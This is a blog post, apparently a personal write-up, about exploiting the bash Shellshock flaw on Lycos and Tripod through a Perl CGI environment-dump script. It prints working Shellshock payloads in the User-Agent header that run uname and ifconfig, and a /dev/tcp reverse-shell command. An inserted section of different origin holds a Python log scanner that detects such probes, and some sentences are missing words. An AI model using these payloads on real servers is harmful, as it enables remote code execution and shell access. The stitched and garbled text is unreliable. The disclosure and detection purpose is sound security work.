My ShellShockings

While I was surfing the interwebs, my eyes caught a Perl script which prints out the environment variables. For example, something like this.
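[code language="perl"]
use CGI;

$cgi = new CGI;

# Collect every GET/POST parameter sent with the request
for $key ( $cgi->param() ) {
    $input{$key} = $cgi->param($key);
}

# CGI response header, blank line, then the start of the page
print qq{Content-type: text/html

<html><body>};

# Dump the whole CGI environment, including the client-controlled HTTP_* values
foreach $key (sort (keys %ENV)) {
    print $key, ' = ', $ENV{$key}, "<br>\n";
}

# Echo the request parameters back as well
for $key ( keys %input ) {
    print $key, ' = ', $input{$key}, "<br>\n";
}

print qq{<form METHOD=POST><input type="submit" value="Post Request">
<input name="postfield"></form>};
print qq{<form METHOD=GET ><input type="submit" value="Get Request ">
<input name="getfield" ></form>};

print qq{</body></html>};
[/code]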
This would output the following.
[code language="text"]
CONTEXT_DOCUMENT_ROOT : /var/chroot/home/
DOCUMENT_ROOT : /var/chroot/home/
GD_PHP_HANDLER : x-httpd-php5-3
HTTP_ACCEPT : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
HTTP_ACCEPT_ENCODING : gzip, deflate, sdch
HTTP_CONNECTION : keep-alive
HTTP_USER_AGENT : Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
PATH : /usr/local/bin:/usr/bin:/bin
[/code]
The HTTP_USER_AGENT value comes straight from the "User-Agent:" header sent by the client, and we can set that header to whatever input we like. So yes, it was vulnerable to the bash Shellshock vulnerability. For example, let's inject "uname -a" and see the output.
[code language="text"]
GET xxxx HTTP/1.1
User-Agent: () { :;}; echo; /bin/bash -c "uname -a"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
[/code]

Let's try () { :;}; echo; /bin/bash -c "/sbin/ifconfig"

Since we are arbitrarily injecting code into the bash shell we can get a reverse connection like this.
User-Agent: () { :;}; echo; /bin/bash -i >& /dev/tcp/ 0>&1

That is it, Game Over 🙂 This is how I owned Lycos and Tripod. As soon as I found this I reported them and they have already fixed this.
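
The requests shown above all carry the same marker: a header value that begins with a bash function definition, "() {". As an added example (not code from the original post), the Python below scans Apache combined-format access log lines for that marker in the request line, Referer and User-Agent fields. The sample log lines, the /cgi-bin/env.pl path, the loose whitespace matching and the function names are assumptions constructed for illustration.

```python
import re

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'   # quoted field; Apache logs embedded quotes as \"
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' \d{3} \S+ ' + QUOTED + ' ' + QUOTED + r'$'
)
FIELDS = ("request", "referer", "agent")

# Vulnerable bash parses an environment value as a function when it starts with "() {".
# Assumption: whitespace is matched loosely so spacing variants are also flagged.
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')


def find_shellshock_probes(lines):
    """Return (host, field, value) for each logged field containing a function definition."""
    hits = []
    for line in lines:
        m = COMBINED.match(line.rstrip("\n"))
        if not m:
            continue  # not combined format: skip instead of guessing at fields
        host = m.group(1)
        for field, raw in zip(FIELDS, m.groups()[1:]):
            value = raw.replace('\\"', '"')  # undo the log's quote escaping
            if FUNC_DEF.search(value):
                hits.append((host, field, value))
    return hits


# Constructed sample lines (documentation IP ranges, hypothetical /cgi-bin/env.pl path)
SAMPLE_LOG = [
    r'192.0.2.10 - - [10/Jan/2015:09:12:40 +0000] "GET /cgi-bin/env.pl HTTP/1.1" 200 1843 '
    r'"-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36"',
    r'198.51.100.7 - - [10/Jan/2015:09:13:02 +0000] "GET /cgi-bin/env.pl HTTP/1.1" 200 512 '
    r'"-" "() { :;}; echo; /bin/bash -c \"uname -a\""',
    r'203.0.113.5 - - [10/Jan/2015:09:14:17 +0000] "GET /cgi-bin/env.pl HTTP/1.1" 200 498 '
    r'"() { :;}; echo" "curl/7.38.0"',
    'truncated line without the expected fields',
]

if __name__ == "__main__":
    for host, field, value in find_shellshock_probes(SAMPLE_LOG):
        print(f"{host}\t{field}\t{value}")
```

A hit only shows that a probe was logged; whether the host was affected depends on the bash version behind the CGI handler.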
By the way was too affected by the Shellshock vulnerability.

After reporting them, it too was successfully patched.
Bonus: Tripod had a reflected XSS vulnerability too.

I don’t know why it gives such a search result 😉
